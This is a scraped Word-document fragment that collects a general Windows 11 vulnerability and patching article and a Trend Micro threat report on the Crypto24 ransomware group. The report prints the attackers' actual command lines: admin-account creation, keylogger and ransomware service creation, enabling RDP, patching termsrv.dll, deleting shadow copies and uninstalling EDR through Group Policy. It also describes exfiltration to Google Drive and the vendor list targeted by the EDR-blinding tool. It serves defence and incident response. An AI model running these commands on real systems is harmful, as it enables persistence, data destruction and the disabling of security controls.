and social engineering attacks that bypass traditional defenses.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Human Factor - Weak passwords, outdated patches, and careless user behavior often make even the most secure system vulnerable. Latest Windows 11 Vulnerabilities in 2025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Microsoft releases Patch Tuesday updates every month, but security researchers also discover new issues continuously. Some of the most notable Windows 11 vulnerabilities reported recently include: 1. Privilege Escalation Vulnerabilities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Privilege escalation occurs when a hacker with limited access to a system gains higher-level permissions, often becoming an administrator.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CVE-2025-XXXXX (Example) - Security researchers discovered a flaw in the Windows Kernel that allowed local users to elevate privileges. Attackers could exploit this to install malicious software, modify data, or create new admin accounts.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Why it matters: Even if malware first gains entry with limited rights, privilege escalation allows it to take full control. 2. Remote Code Execution (RCE) Flaws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RCE vulnerabilities are some of the most dangerous because they allow attackers to run malicious code on a system remotely, without direct access.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RDP (Remote Desktop Protocol) Exploits - Several RCE vulnerabilities have been patched in Windows 11's Remote Desktop services. Hackers often target RDP because it provides remote access to corporate systems.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Microsoft Office Integration Exploits - Since Office apps are tightly integrated with Windows 11, flaws in handling documents can lead to RCE attacks. 3. Zero-Day Exploits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zero-day is a vulnerability that is exploited before Microsoft has released a patch.</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Browser-Based Zero-Days - Microsoft Edge, built on Chromium, has faced zero- day exploits targeting its rendering engine. Since Edge is deeply integrated into Windows 11, this poses a high risk.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Windows Defender Bypass - Researchers have found ways to bypass certain protections in Microsoft Defender, allowing malware to run undetected. 4. Driver Vulnerabilities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Third-party drivers remain a weak point in Windows security. Hackers often exploit unsigned or poorly coded drivers to execute malicious actions at the kernel level.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GPU Driver Exploits - Recently, vulnerabilities were found in popular graphics drivers that could allow attackers to crash systems or gain elevated privileges. 5. Phishing and Credential Theft Exploits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not always a flaw in Windows itself, attackers leverage the Windows login system to steal credentials.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Pass-the-Hash Attacks - Hackers can exploit stored credentials in Windows memory to authenticate without needing the actual password.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Malicious Email Attachments - Exploiting weaknesses in Windows file handling, attackers trick users into opening attachments that deploy ransomware. Real-World Exploits on Windows 11</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Understanding vulnerabilities is one part; knowing how they're exploited is equally important. Here are real-world examples of attacks on Windows 11 systems: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Ransomware Campaigns - Groups like LockBit and BlackCat have targeted organizations running Windows 11, often using phishing emails combined with privilege escalation exploits.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Fake Windows Updates - Hackers distribute malware disguised as Windows Update installers, tricking users into downloading malicious files.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IoT and Hybrid Attacks - With Windows 11 being used on laptops and tablets, attackers often combine device exploits with network-based attacks.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Supply Chain Attacks - Vulnerabilities in third-party apps bundled with Windows 11 have been exploited, giving hackers indirect access to systems. Microsoft's Response: Regular Patching and Security Features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Microsoft has a multi-layered response to vulnerabilities in Windows 11:</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Patch Tuesday - A scheduled release of monthly updates fixing dozens of vulnerabilities.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Out-of-Band Patches - Emergency updates issued when a critical zero-day exploit is being actively used in the wild.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Enhanced Security Tools - Features like Windows Hello, Virtualization-Based Security (VBS), and Smart App Control reduce risks from common attack vectors.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Security Baselines - Microsoft provides recommended security configurations for enterprises to harden Windows 11. Patching Guide: How to Stay Protected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Now that we know the risks, let's go step by step on how to keep Windows 11 protected. 1. Enable Automatic Updates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Go to Settings &gt; Windows Update &gt; Advanced Options and ensure automatic updates are enabled.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ensures you get the latest patches as soon as they're released. 2. Manually Check for Updates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Sometimes, automatic updates are delayed. Regularly check manually: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Settings &gt; Windows Update &gt; Check for Updates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Install all critical and cumulative updates immediately. 3. Update Device Drivers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Use Windows Update and official vendor websites to update drivers.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Avoid downloading drivers from untrusted third-party sources. 4. Use Microsoft Defender or a Trusted Antivirus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Keep Windows Security enabled at all times.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If you prefer third-party antivirus, choose a reputable vendor with active support for Windows 11. 5. Enable Core Isolation &amp; VBS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Go to Windows Security &gt; Device Security &gt; Core Isolation and turn on Memory Integrity.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helps block kernel-level exploits. 6. Secure Remote Access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Disable RDP unless absolutely necessary.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If using RDP, enable Network Level Authentication (NLA) and use a VPN. 7. Patch Third-Party Applications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Many Windows 11 attacks come through apps like browsers, PDF readers, and office tools.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Keep these updated with the latest security patches. 8. Backup Your Data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Use OneDrive Backup or external drives for regular backups.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case of ransomware, backups can save you from data loss. Best Practices for Enterprises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Businesses using Windows 11 need to go beyond basic patching. Here are enterprise-grade security practices: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Centralized Patch Management - Use Microsoft Intune or Windows Server Update Services (WSUS) to push updates.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Regular Vulnerability Scans - Employ tools like Microsoft Defender for Endpoint to scan for misconfigurations.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Multi-Factor Authentication (MFA) - Protect user accounts with MFA, especially for administrators.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Application Control Policies - Use AppLocker or Smart App Control to prevent unauthorized apps from running.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Employee Awareness Training - Human error is still the biggest threat. Train staff to recognize phishing and social engineering. Future of Windows 11 Security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Looking ahead, Microsoft is investing heavily in AI-driven security and deeper hardware integration. Some trends we can expect include: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AI-Powered Threat Detection - Smarter algorithms in Defender to catch zero- day exploits.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Cloud-First Security - Integration with Azure Security to provide real-time monitoring.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Stronger Isolation - More features running in secure, sandboxed environments to minimize attack surfaces.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Passwordless Security - Wider adoption of Windows Hello, making passwords obsolete. Conclusion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Windows 11 has raised the bar for security compared to previous versions, but no operating system is invulnerable. Cybercriminals continue to find new exploits, from privilege escalation to remote code execution, and zero- days remain a constant risk.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good news is that most attacks can be prevented with regular patching, proper configuration, and strong security practices. Whether you're an individual user or managing hundreds of systems in an enterprise, following the patching guide and best practices outlined in this article will drastically reduce your exposure to cyber threats. In the ever-changing landscape of cybersecurity, the key to staying safe is vigilance. Windows 11 is secure, but only as secure as its last update.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Views: 103</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Anonymous Hackers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Anonymous Hackers 2025.08.22 19:10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.anonymoushackers.net/windows-news/windows-11-vulnerabilities-latest-exploits-and-patching-guide/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Crypto24 Ransomware Group Blends Legitimate Tools with Custom Malware for Stealth Attacks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Crypto24 is a ransomware group that stealthily blends legitimate tools with custom malware, using advanced evasion techniques to bypass security and EDR technologies.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Maristel Policarpio, Sarah Pearl Camiling, Don Ovid Ladores, Jacob Santos, Andrei Alimboyao, Lance Albert Mendoza August 14, 2025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Key Takeaways The operators of the Crypto24 ransomware conduct coordinated, multi-stage attacks using both legitimate tools and custom malware to gain access, move laterally, and evade detection.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Persistence is maintained through privileged account creation and scheduled tasks that integrate in malicious activities with normal operations. The attackers use advanced evasion methods, including custom EDR bypass tools and targeted manipulation of security solutions.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Data theft and ongoing surveillance are achieved through keyloggers, Google Drive exfiltration, and persistent remote access.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Crypto24 has been targeting organizations in Asia, Europe, and the USA, with a focus on sectors such as financial services, manufacturing, entertainment, and technology.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Trend Vision OneTM detects and blocks the Crypto24 indicators of compromise (IOCs) outlined in this blog, and provides customers with tailored hunting queries, threat insights, and intelligence updates. Additional mitigation guidance is also provided below.</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Introduction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this blog entry, we analyze the Crypto24 ransomware to offer insights into its operator's ongoing attack campaigns. Our analysis reveals that the threat actor operates with a high level of coordination, frequently launching attacks during off-peak hours to evade detection and maximize impact. Crypto24 has been targeting high-profile entities within large corporations and enterprise-level organizations. The scale and sophistication of recent attacks indicate a deliberate focus on organizations possessing substantial operational and financial assets. The group has concentrated its efforts on organizations in Asia, Europe, and the USA, with targets spanning the financial services, manufacturing, entertainment, and technology sectors.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ransomware group employs a diverse and sophisticated toolkit. Their arsenal includes PSExec for lateral movement, AnyDesk for persistent remote access, keyloggers for credential harvesting, various backdoor malware, and Google Drive for stealthy data exfiltration. The threat actors also exhibit advanced evasion techniques, such as deploying a customized version of RealBlindingEDR and abusing gpscript.exe, which is a legitimate Group Policy utility, to remotely execute the Trend Vision OneTM uninstaller from a network share.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 observed cases where attackers executed the Trend Vision One uninstaller, XBCUninstaller.exe, via gpscript.exe. The file in question is a legitimate tool provided by Trend Micro for troubleshooting, specifically to resolve issues such as fixing inconsistent agents within Trend Vision One deployments. Its intended use is to cleanly uninstall Endpoint BaseCamp when required for maintenance or support.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Note that XBCUninstaller.exe is not a vulnerability. In observed cases, attackers were only able to use this tool after gaining elevated (administrator) privileges through prior compromise of affected systems. The tool itself requires administrative permissions to run and cannot be abused as an initial infection vector.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we observed represents a classic example of "living off the land" tactics, where threat actors leverage legitimate administrative tools to further their attacks in post-compromise scenarios. In this case, they used our own maintenance tool to disable endpoint protection before moving laterally to other devices. However, systems with properly configured security controls and robust access management, consistent with the principle of least privilege, remain protected from such attacks.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Significance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Crypto24 campaign represents a dangerous evolution in ransomware operations. Unlike more conventional groups, the threat actor demonstrates a high level of operational maturity, skillfully combining legitimate tools (PSExec, AnyDesk) alongside custom malware, which allows them to blend in with normal IT operations while executing precision attacks during off-peak hours. This multi-layered approach extends beyond encryption to include keyloggers for credential harvesting and Google Drive for data exfiltration, creating persistent exposure risks that outlast the initial infection.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importantly, Crypto24's successful deployment of a customized RealBlindingEDR (an open-source tool for disabling security solutions) variant that neutralized our security controls shows their capability to maneuver around modern defenses. The threat actor's customized version employs advanced evasion, likely via unknown vulnerable drivers, showcasing deep technical expertise and ongoing tool refinement. The group's ability to maintain persistence before encryption reflects patience and strategic planning uncommon in commodity ransomware.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Beyond being another regular ransomware campaign-Crypto24 attacks demonstrate that threat actors have studied our security stacks, identified systematic weaknesses, and built purpose-designed tools to exploit them. Organizations using similar defenses should consider themselves at immediate risk, making it essential to understand Crypto24's methodology to adapt our defensive strategies against adversaries who have already proven capable of defeating them. Detailed technical analysis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 The Crypto24 ransomware attack chain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Valid Accounts: Local Accounts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 part of its attack routine, the threat actor reactivated default administrative accounts and created multiple new user accounts-often with common or generic names to avoid drawing attention. These accounts were then added to privileged groups, such as Administrators, to preserve persistent elevated access.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using standard Windows net.exe commands, the attacker created and modified accounts, reset passwords, and re-enabled previously disabled profiles. This approach provided multiple entry points into compromised systems while making detection more difficult during routine security audits. Discovery: Account Discovery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each account created, the threat actor used the 1.bat file to gather system information, retrieve information about the partitions on the disk, and query information about the operating system via the WMIC command as part of their reconnaissance efforts. The collected information included disk partition names, sizes, and types to understand storage configuration; total physical memory and system caption to assess hardware capabilities; local user accounts to map existing access; and local group memberships to identify privilege levels and high-value targets for lateral movement. This reconnaissance data allowed the threat actor to profile the compromised system and plan subsequent attack stages.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Process file path Command line cmd.exe/c '\ \&lt;REDACTED&gt;\Scan\1.bat' wmic partition get name,size,type wmic COMPUTERSYSTEM get TotalPhysicalMemory,caption cmd.exe net user net localgroup</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 Gathering system and partition data using WMIC in 1.bat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Persistence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threat actor maintains persistence on compromised systems via Windows Scheduled Tasks and services, effectively leveraging legitimate processes such as svchost.exe to blend in with normal system operations and evade detection.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Scheduled tasks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Batch and script files located in %ProgramData%\Update\ are executed at regular intervals, likely to facilitate the installation or execution of malicious payloads in a timely manner.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>%ProgramData%\Update\update.vbs %ProgramData%\Update\vm.bat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Malicious services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attacker uses sc.exe (service control) a tool use to create, manage, and control Windows services, to establish new services for the deployment of a keylogger and the Crypto24 ransomware: Keylogger: sc create WinMainSvc type= share start= auto binPath= "C:\Windows\System32\scvhost.exe -k WinMainSvc" Ransomware: sc create MSRuntime type= share start= auto binpath= "C:\Windows\System32\svchost.exe -k MSRuntime" displayname= "Microsoft Runtime Manager"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Following the discovery of potential user accounts, the threat actor leverages the update.bat file to create an additional user account. This account is assigned to both the Administrators and Remote Desktop Users groups, granting it elevated privileges and the ability to connect to the system remotely. Privilege Escalation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 observed the use of runas.exe and PSExec to execute processes with elevated privileges.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Process file path Command line Description cmd /c C:\update.bat net.exe localgroup administrators john /add Adding a user to the administrator group grants them elevated privileges, allowing them to perform tasks with high-level access.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>net.exe localgroup administrators service.lot9 /add net.exe localgroup administrators 00025436 /add net.exe localgroup "administrators" "NetUser" /add net.exe localgroup "Remote Desktop Users" "NetUser" /add net.exe localgroup administrators IT.Guest /add C:\Windows\explorer.exe runas.exe /user:administrator cmd used to open a Command Prompt window with administrator privileges by running it as the specified administrator user.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>$mytemp$\low\psexec64.exe $mytemp$\low\psexec64.exe -u &lt;REDACTED&gt; -p &lt;REDACTED&gt; cmd leverages PsExec to remotely execute a command prompt (cmd) with the credentials of a privileged user, facilitating privilege escalation by granting higher-level access to the system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2. Processes and corresponding command lines for the privilege escalation stage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Defense Evasion: Impair Defenses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Throughout the attack lifecycle, the threat actor persistently created administrative accounts, initiated remote desktop protocol (RDP) sessions, and used the previously mentioned tools to maintain access.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attackers escalated their activities by deploying a tool resembling RealBlindingEDR, a utility specifically designed to bypass Endpoint Detection and Response (EDR) mechanisms. We detected the files associated with this tool across multiple endpoints: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File Path</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%USERPROFILE%.&lt;REDACTED&gt;\AppData\Local\Temp\Low\AVB.exe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%USERPROFILE%.&lt;REDACTED&gt;\AppData\Local\Temp\Low\AVMon.exe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%PROGRAMDATA%\update\avb.exe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tool accepts a single command-line argument to specify the driver number and corresponding function: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Command line Description 1 Loads WdFilter.sys (Windows Defender Filter Driver) 2 Loads MpKslDrv.sys (Microsoft Malware Protection Kernel Service Library Driver) 3 Loads mpsdrv.sys (Microsoft Protection Service Driver) 4 Loads WdNisDrv.sys (Windows Defender Network Inspection Service Driver)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3. Command-Line Arguments and Usage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tool is programmed to remove callbacks only from products identified as belonging to these companies: Gen Digital Kaspersky AVG Technologies Sophos SurfRight Trend Micro Malwarebytes Bitdefender Avira Symantec Broadcom Total Security Trellix Sentinel RSUPPORT AhnLab Cynet Panda Cylance Open Text Sangfor Technologies Quick Heal CoSoSys Cisco Systems McAfee Fortinet Comodo Security Solutions Acronis Citrix</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2. Retrieving company name from driver metadata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3. Comparing the retrieved company name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Lateral Movement: Remote Services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Following the initial compromise of the system through the creation of a new user account, the threat actor escalated their access via PsExec and executed specific commands to solidify their foothold and enable unauthorized remote access.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Process file path Command line C:\Windows\PSEXESVC.exe (Executed by PsExec for remote administration) C:\Windows\System32\cmd.exe C:\Windows\System32\reg.exe ADD "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f C:\Windows\System32\netsh.exe advfirewall firewall add rule name="Open Remote Desktop" protocol=TCP dir=in localport=3389 action=allow</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4. Processes and corresponding command lines for the account discovery stage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Process file path Command line C:\Program Files\Google\Chrome\Application\chrome.exe $myuserprofile$\downloads\ipscan-3.9.1-setup.exe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5. An IP scanning tool was also installed on one of the endpoints, likely to identify additional devices for lateral movement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Collection and Credential Access - Input Capture: Keylogging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unauthorized remote access established, the threat actor escalated their activity by deploying a keylogger (WinMainSvc.dll). This was executed via a batch script (run_new.bat) on the compromised host. The keylogger was configured to capture sensitive data, including credentials, and ensured persistence by creating a scheduled task.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Process file path Command line cmd /c "C:\Users\70082156\AppData\Local\Temp\Low\run_new.bat Creation of C:\Windows\system32\WinMainSvc.dll C:\WINDOWS\system32\sc.exe create WinMainSvc type= share start= auto binpath= C:\Windows\system32\svchost.exe -k WinMainSvc" displayname= "Microsoft Help Manager"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6. Processes and corresponding command lines for the collection and credential access stages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Keylogger details: WinMainSvc.dll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WinMainSvc.dll checks if the command line includes "C:\Windows\system32\svchost.exe" to ensure it runs only as a service or via svchost.exe.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4. As part of its evasion technique and prevent sandbox execution, it checks whether the command line contains "C:\Windows\system32\svchost.exe", ensuring that it is only being run by svchost.exe or as a service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logging of control key inputs suggests the presence of keylogging functionality.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5. Control keys that are being written or logged when pressed, indication of keylogging functionality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The following pseudocode appears to represent a function that downloads a file from Google Drive using the Google Drive API, leveraging WinINet API:</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6. This pseudocode appears to represent a function that downloads a file from Google Drive using the Google Drive API, leveraging WinINet API</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ransomware first creates a file named "Test.txt" containing the word "Test" and uploads it to Google Drive, likely to verify whether the upload process is working correctly. If successful, it proceeds to upload the captured keystrokes and active window titles it has collected.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7. Creation of the file named "Test.txt" and uploads the file to google drive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threat actor further utilized Windows Management Instrumentation (WMI) to execute remote commands, reinforcing unauthorized access by enabling RDP connections once again. This use of native Windows utilities demonstrates efforts to evade detection and maintain persistence.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Process file path Command line / action C:\Windows\System32\wbem\WmiPrvSE.exe cmd /c c:\programdata\run.bat &gt; c:\programdata\log.txt 2&gt;&amp;1 &lt;br&gt; reg ADD "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f netsh.exe advfirewall firewall add rule name="Open Remote Desktop" protocol=TCP dir=in localport=3389 action=allow</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7. Enabling RDP and configuring the system's firewall to facilitate unrestricted remote access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 further exploit RDP functionality, the actor patched termsrv.dll, which manages RDP sessions. This modification enabled multiple simultaneous RDP connections, further aiding lateral movement and remote administration.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Description Command line Created patched termsrv.dll Powershell.exe -ep Bypass -@file 'C:\ProgramData\m.ps1' Took ownership of termsrv.dll takeown.exe /F C:\Windows\System32\termsrv.dll /A Granted administrative permissions to termsrv.dll icacls.exe C:\Windows\System32\termsrv.dll /grant Administrators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8. Exploiting RDP functionality via patched termsrv.dll file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several RDP sessions, the attacker escalated control by installing TightVNC for remote desktop access and re-established the keylogger service (WinMainSvc.dll), ensuring sustained surveillance and credential capture. Process file path Command line / action C:\Windows\explorer.exe (Installation and configuration of TightVNC) C:\Windows\System32\cmd.exe (Used for executing additional persistence and surveillance tasks) C:\WINDOWS\system32\sc.exe /C "C:\Users\default.&lt;REDACTED&gt;\AppData\Local\Temp\Low\run_new.bat" &lt;br&gt; create WinMainSvc type= share start= auto binpath= "C:\Windows\system32\svchost.exe -k WinMainSvc" displayname= "Microsoft Help Manager"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9. Installing TightVNC and reestablishing the keylogger service (WinMainSvc.dll),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major escalation, the threat actor installed MSRuntime.dll as a service, intending it to act as the ransomware payload. Initial execution attempts failed, as Trend solutions detected and immediately terminated the ransomware's behavior.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several hours, the threat actor deployed an uninstaller for EDR solutions via Group Policy Object (GPO), followed by a subsequent successful execution of the ransomware payload. Evidence of this was seen in the creation of encrypted files and ransom notes.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File path Command line Gpscript.exe cmd /c "\&lt;REDACTED&gt;\VisionOne\remover\VisionOne_removal_v2.bat" c:\temp\vo_remove2\xbcuninstaller.exe Gpscript.exe cmd /c "\&lt;REDACTED&gt;\VisionOne\remover\VisionOne_removal_v2.bat" C:\temp\vo_remove2\XBCUninstaller.exe C:\Windows\System32\cmd.exe /c vssadmin delete shadows /all /quiet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10. Command Lines Associated with Specific File Paths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Crypto24 has been targeting high-profile entities within large corporations and enterprise-level organizations. The scale and sophistication of recent attacks indicate a deliberate focus on organizations possessing substantial operational and financial assets. The group has focused its efforts on organizations in Asia, Europe, and the USA. Meanwhile, its targets include companies in the financial services, manufacturing, entertainment, and technology sectors. Enabling agent self-protection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threat actor using a customized anti-EDR tool such as RealBlindingEDR- potentially exploiting new or unknown vulnerable drivers-could target several endpoints; however, the success of such an attack would depend on the strength and completeness of the security controls implemented on each endpoint.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behavioral solutions and pattern detections may effectively block the attack, endpoints with weaker security configurations or disabled protections could remain susceptible. In such cases, an attacker could gain access and perform actions such as uninstalling security solutions via administrative scripts and remote desktop with elevated privileges.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Enabling agent self-protection on Windows prevents local users from tampering or removing Trend's agent. Furthermore, activating Trend's Self- Protection feature ensures that local users cannot tamper with or uninstall any Trend products, preserving endpoint integrity and safeguarding critical security controls. Conclusion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Crypto24 ransomware campaign highlights the escalating operational sophistication and adaptability of modern threat actors. By leveraging a strategic combination of legitimate IT tools-including PsExec, AnyDesk, and Group Policy utilities-alongside Living Off the Land Binaries (LOLBins), custom malware, and advanced evasion techniques, the operators successfully gain initial access, execute lateral movement, and establish persistent footholds within targeted environments.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Our analysis reveals that Crypto24's operators are fully capable of identifying and targeting security-specific controls, including EDR solutions, and employing purpose-built tools to bypass defenses. The attackers demonstrate a clear understanding of enterprise defense stacks and an ability to circumvent them.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Crypto24 serves as a warning that modern ransomware groups are highly adaptive, blending in with normal IT operations while deploying attacks. As threat actors continue to study and maneuver around existing defenses, it is important for defenders to remain agile and continually evaluate, update, and reinforce their cybersecurity posture.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Rapid incident response remains a critical part of an organization's security posture. When threat actors are able to maintain a presence within a network over an extended period, they can map the environment, compile custom ransomware binaries, and conduct extensive data exfiltration before executing a final attack. Proactive detection, timely investigation, and swift remediation are essential to disrupting such activities and minimizing potential impact.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Building on the guidance outlined in the "Enabling Agent Self-Protection" section, the following recommendations can further help organizations strengthen their defenses against advanced, multi-layered attacks such as those employed by Crypto24.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Regularly audit and limit the creation and use of privileged accounts; disable unused default administrative accounts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Limit RDP and remote tool usage (e.g., PsExec, AnyDesk) to authorized systems; enable MFA and routinely review firewall configurations.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Detect and investigate unusual uses of built-in Windows utilities and third- party remote access tools for signs of lateral movement.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Ensure EDR and other security solutions are up-to-date and continuously monitored for attempted uninstallation or bypass.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>A: Regularly inspect scheduled tasks and service creations for unauthorized or suspicious activity.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Monitor for unauthorized changes to key system files and unusual outbound traffic, such as data exfiltration to cloud storage.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Keep regular, offline backups and routinely verify that restoration processes function as intended.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Ensure that all systems, especially those with administrative access, have proper security agent coverage and monitoring.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Implement a Zero Trust Framework that operates on the principle of "never trust, always verify.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Train users on phishing and credential risks and maintain an effective incident response strategy. Proactive security with Trend Vision OneTM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 Vision OneTM is the only AI-powered enterprise cybersecurity platform that centralizes cyber risk exposure management, security operations, and robust layered protection. This holistic approach helps enterprises predict and prevent threats, accelerating proactive security outcomes across their respective digital estate. With Trend Vision One, you're enabled to eliminate security blind spots, focus on what matters most, and elevate security into a strategic partner for innovation, especially in the cases of novel ransomware variants as in the one discussed in this blog. Trend Vision One TM Threat Intelligence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 stay ahead of evolving threats, Trend customers can access Trend Vision OneTM Threat Insights, which provides the latest insights from Trend Research on emerging threats and threat actors.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 Vision One Threat Insights Emerging Threats: Decrypting the Encryptors: Crypto24's Campaign TTPs, Timeline, and Attack Chain Trend Vision One Intelligence Reports (IOC Sweeping) Decrypting the Encryptors: Crypto24's Campaign TTPs, Timeline, and Attack Chain Hunting Queries Trend Vision One Search App</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 Vision One customers can use the Search App to match or hunt the malicious indicators mentioned in this blog post with data in their environment.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Suspicious Keylogger Log Creation via Svchost and WinMainSvc</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eventSubId: 101 AND parentFilePath: "C:\Windows\System32\svchost.exe" AND parentCmd: /\-k WinMainSvc/ AND objectFilePath: /Windows\\tmp\\.+_\d{4}\.log/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hunting queries are available for Trend Vision One customers withThreat Insights entitlement enabled.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Indicators of Compromise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indicators of compromise for this entry can be found here.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Trend Micro 2025.08.14 12:03</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.trendmicro.com/en_us/research/25/h/crypto24-ransomware-stealth-attacks.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
